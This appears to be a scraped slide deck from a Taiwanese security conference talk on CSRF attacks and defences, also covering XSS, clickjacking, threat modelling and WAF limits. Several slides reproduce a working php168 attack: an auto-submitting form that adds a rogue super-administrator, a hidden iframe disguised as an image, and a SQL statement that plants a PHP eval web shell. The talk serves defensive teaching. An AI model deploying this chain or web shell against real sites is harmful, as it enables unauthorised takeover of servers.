tais 台灣學術資訊安全國際研討會 csrf( 跨站偽冒請求 ) 攻擊的分析與防護 ...
DESCRIPTION
TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n. 夏克強 麟瑞科技 資深技術顧問 CISSP, CHFI, CEH. Why Web application Vulnerable. Web Servers. Application Servers. Database Servers. Operating Systems. Operating Systems. Operating Systems. Network. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/1.jpg)
TAIS 台灣學術資訊安全國際研討會CSRF( 跨站偽冒請求 ) 攻擊的分析與防護
Cross-Site Request Forgery Threat and Mitigation
夏克強麟瑞科技 資深技術顧問CISSP, CHFI, CEH
![Page 2: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/2.jpg)
Why Web application Vulnerable
Improved commercial or in-house application access to information means improved access for hackers?
個人資料交易紀錄客戶資料
Database Servers
Customer InfoBusiness DataTransaction Info
網站應用程式 (Web AP)• 未上線的急於上線• 已上線的年代久遠
75% 攻擊集中於此75% 攻擊集中於此
Network
OperatingSystems
DatabaseServers
OperatingSystems
ApplicationServers
OperatingSystems
WebServers
網路防火牆
IDSIPS
SQL InjectionParameter TamperingXSS, .., etc.
![Page 3: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/3.jpg)
Mapping from 2007 to 2010 Top 10
+
+
--
=
=
OWASP TOP TEN
![Page 4: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/4.jpg)
Cybercrime 威脅 Cyber pickpocketing
BEBLOH, where the malware went beyond “traditional” keylogging by not only stealing credit card information but also accessing the account and transferring funds to another account
![Page 5: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/5.jpg)
Cross-Site Scripting
Reflected XSS, Stored XSS (aka Persistent XSS)Samy WormWeb sites compromised: FBI.gov, CNN.com,
Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes
Top vulnerable weakness in recent yearsWeb sites vulnerable to XSS: searching
page, forum, comment, login page..
Cross-Site Scripting attacksHoaxSteal user’s session Id and cookiesAlmost full control to your browsers such as port scan, keylogger and send requests on behave of the client
![Page 6: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/6.jpg)
Stored Cross-Site Scripting
Application with stored XSS vulnerability
3
2
Attacker sets the trap – update my profile
Attacker enters a malicious script into a web page that stores the data on the server
1
Victim views page – sees attacker profile
Script silently sends attacker Victim’s session cookie
Script runs inside victim’s browser with full access to the DOM and cookies
Custom Code
Accou
nts
Fin
an
ce
Ad
min
istr
ati
on
Tra
nsacti
on
sC
om
mu
nic
ati
on
Kn
ow
led
ge
Mg
mt
E-C
om
merc
eB
us.
Fu
ncti
on
s
![Page 7: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/7.jpg)
Stored & Reflected XSS
Stored XSS guaranteed that victim users will be already accessing the application at the time that the attack strikes
Reflected XSS may try to engineer this situation by persuading the user to log in
Reflected XSS must use some means of inducing users to visit attacker’s crafted URL
Phishing attack by offering a link to his own malicious web server would be suspected as a scam The requirement for stored XSS is avoided
Stored XSS(aka Persistent XSS) is more serious than reflected XSS
![Page 8: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/8.jpg)
Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕
Clickjacking可視為是一種進階的網路釣魚手法Clickjacking (Session-Riding) 與 CSRF 相似,都是讓使用者在 不自覺的狀況上當Clickjacking 與 CSRF結合 對攻擊有加乘效果
Clickjacking( 點擊綁架 )
![Page 9: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/9.jpg)
使用 Firefox 的 Noscript 的 ClearClick功能阻擋 iframe的執行 (NoScript)或停用 Javascript
Frame busting(也就是 anti-framing) for your own sites<script>if (top != self) top.location = location</script>
IE8 针對 Clickjacking增加 對 Clickjacking攻擊的防禦功能
X-FRAME-OPTIONS: DENYX-FRAME-OPTIONS: SAMEORIGIN
Clickjacking 防禦
![Page 10: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/10.jpg)
Forced Browsing
<html><body>空白頁<iframe src=http://www.google.com.tw/search?hl=zh-TW &q=taiwan+taipei height=0 width=0></body></html>
應用 : 廣告收入技巧 : 數以千計的人點擊 , 來自不同 IP 地址 , 可以規避檢查機制
![Page 11: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/11.jpg)
Cross-Site Request Forgery
![Page 12: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/12.jpg)
CSRF example: 進一步
引誘你點選連結
假如你訪問的購物網站網址為:http://www.hacker.net ,你購買了一個產品,購物網站參數為:http://www.hacker.net/buy.php?item=computer&quantity=1這是一個正常的 HTTP 請求,商品名稱是電腦 computer ,購買數量是 1 ,網站會將所買的商品與數量記錄在用戶的帳戶內。如果黑客知道了 http://www.hacker.net 購物網站的操作流程,他就可以偽造一個類似的 HTTP 請求: http://www.hacker.net/buy.php?item=computer&quantity=1000 ,商品名稱是 computer ,而購買數量卻是 1000 。如果目標用戶在網站登錄期間不小心訪問了這個鏈接,那麼在他的帳戶內就是會有一條記錄是購買 1000 台的 computer
![Page 13: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/13.jpg)
php168 之 CSRF 攻擊
加入網站管理員的頁面為 :
http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember
摘錄自 www.haik8.com
![Page 14: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/14.jpg)
<form name="form1" method="post" action="index.php?lfj=member&action=addmember"> <tr class="head"> <td colspan="2"> 添加新用户 </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 帐号 :</td> <td width="63%"> <input type="text" name="postdb[username]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 密码 :</td> <td width="63%"> <input type="password" name="postdb[passwd]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 重复密码 :</td><td width="63%"> <input type="password" name="postdb[passwd2]"> </td> </tr>
<tr bgcolor="#FFFFFF">
摘錄自 www.haik8.com
php168 之 CSRF 攻擊
![Page 15: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/15.jpg)
<td width="37%"> 所属用户组 :<span help=1> 只有超级管理员与创建人才能添加新的超级管理员 , 只有超级管理员与创始人及前台管理员才能添加新的前台管理员 </span></td> <td width="63%"> <select name='postdb[groupid]' ><option value='' selected> 现有用户组 </option> <option value='2' > 游客组</option> <option value='3' > 超级管理员 </option> <option value='4' > 前台管理员 </option> <option value=''>--+ 以上是系统组,以下是会员组 +--</option> <option value='8' > 普通会员 </option> <option value='9' > 高级会员 </option> </select> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 邮箱 :</td> <td width="63%"> <input type="text" name="postdb[email]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> </td> <td width="63%"> <input type="submit" name="Submit" value=" 提交 "> </td> </tr> </form>
摘錄自www.haik8.com
php168 之 CSRF 攻擊
![Page 16: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/16.jpg)
摘錄自 www.haik8.com
駭客修改程式碼 , 修改完的程式碼如下 : <html><body onload="document.form1.submit()"> <form name="form1" method="post" action="http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember"> <input type="hidden" name="postdb[username]" value=' 樱花浪子 '> <input type="hidden" name="postdb[passwd]" value='nohack'> <input type="hidden" name="postdb[passwd2]" value='nohack'> <select name='postdb[groupid]' ><option value='3' selected> </form> </body></html>
php168 之 CSRF 攻擊
![Page 17: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/17.jpg)
摘錄自 www.haik8.com
這樣我們得到路徑為: http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm ,這樣管理員在登錄前後台的情況下訪問了這個頁面就會添加一個用戶名為“櫻花浪子”、密碼為“ nohack” 的超級管理員
php168 之 CSRF 攻擊
![Page 18: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/18.jpg)
摘錄自 www.haik8.com
但是這樣的話會顯示添加管理員成功的提示,我們要做的隱藏點,來做一個圖片木馬<html><body><iframe src=http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm width=0 height=0></iframe> <img src=/Article/UploadPic/2010-4/2010417144022600.jpg></img> </body> <html> 得到路徑為 special/5_20090426220451_PYwLh.jpg ,http://192.168.0.3/php168/upload_files/ special/5_20090426220451_PYwLh.jpg
php168 之 CSRF 攻擊
![Page 19: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/19.jpg)
摘錄自 www.haik8.com
執行:“ SELECT ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:\ \AppServ\\www\\php168\\nohack.php’”
php168 之 CSRF 攻擊
![Page 20: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/20.jpg)
摘錄自 www.haik8.com
檢查一下 , 顯示已經注入了 !!
php168 之 CSRF 攻擊
![Page 21: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/21.jpg)
行事曆系統範例http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308
![Page 22: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/22.jpg)
CSRF, Referrer 與 X Headers 範例
強迫 victim 讀取行事曆特定日期Countermeasures against CSRF
Clickjacking 與 CSRF 有加乘效果使用 iframe Opacity=30
<a href=‘http://egw.ringline.com.tw/index.php?menuaction= calendar.calendar_uiviews.day&date=20101016> 請點我可打折 </a>
![Page 23: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/23.jpg)
CSRF PreventionsInsert custom random tokens into every form and URL
Store a single token in the session and add it to all forms and linksHidden Field: <input name="token"
value="687965fdfaew87agrde" type="hidden"/>Single use URL: /accounts/687965fdfaew87agrdeForm Token: /accounts?auth=687965fdfaew87agrde …
For sensitive data or value transactions, re-authenticate or use transaction signing
Verify Referrer header, but XHR can break it.Verify X-header. It is more effective than Referrer header due to
SOP.legal example:GET /auth/[email protected] HTTP/1.1Host: social.siteX-CSRF: 1Illegal example:<html><img src=http://social.site/auth/update_profile.cgi?
[email protected]></html>
GET /auth/[email protected] HTTP/1.1Host: social.site
Ensure that there are no XSS vulnerabilities in your application
![Page 24: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/24.jpg)
Ratproxy
Semi-auto web application securityassessment tool for XSS, CRSF
Findings should be validated by manualtesting and analysis where appropriate
Not all of the issues reported necessarily correspond to actual security flaws
![Page 25: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/25.jpg)
Microsoft Threat Modeling
Denial of service
Elevation of privilege
Spoofing identity
Information disclosure
Repudiability
Tampering with data(integrity)
Threats
Affected users
Discoverability
Damagepotential
Exploitability
Reproducibility
Rating
SSSS
TTTT
RRRR
IIII
DDDD
EEEE
DDDD
AAAA EEEE
RRRR
DDDD
![Page 26: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/26.jpg)
Microsoft Threat Modeling
1. Identify assets
2. Create an architecture overview3. Decompose the application
4. Identify the threats
5. Document the threats
6. Rate the threats
![Page 27: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/27.jpg)
OWASP Risk Methodology
![Page 28: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/28.jpg)
CSRF Rating Example
![Page 29: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/29.jpg)
CVSS (Metrics View)
![Page 30: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/30.jpg)
![Page 31: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/31.jpg)
![Page 32: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/32.jpg)
Obstacle for Code Review(or Scanners)
5
4
3
2
1
• Can’t provide immediate protection• Web applications, change frequently. In many cases the application can change before a full review cycle has been completed• The source code is not readily “available” or “understood”• With enough MIS staffs and time to do re-coding ?
• Manual code fixes are only as good as the developer
• Attacks, (again, especially Web attacks), also change frequently. • No multiple services correlation capability• Can’t track the accurate user who launches the attacks and the attack patterns
![Page 33: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/33.jpg)
Continued
10
9
8
7
6• Suitable for developing phase, not for production phase• Suitable for developing phase, not for design phase (only resolved by Risk Analysis)
• Slow response to compliance requirements
• Can’t protect web servers and backend database servers
• No web site cloaking such as anti Google hack
• Can’t provide additional insight into those that are requiring writing to the database or are accessed by transaction only
![Page 34: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/34.jpg)
5
4
3
2
1 • Suitable for production phase, not for developing phase
• Suitable for developing phase, not for design phase (only resolved by Risk Analysis) • Lack of Logical flaws detection (only resolved by human code review)• Applications do something insecure
• Can’t accurately correct application flaws
• WAF could go down (fail-open or fail-close)
Obstacle for WAFs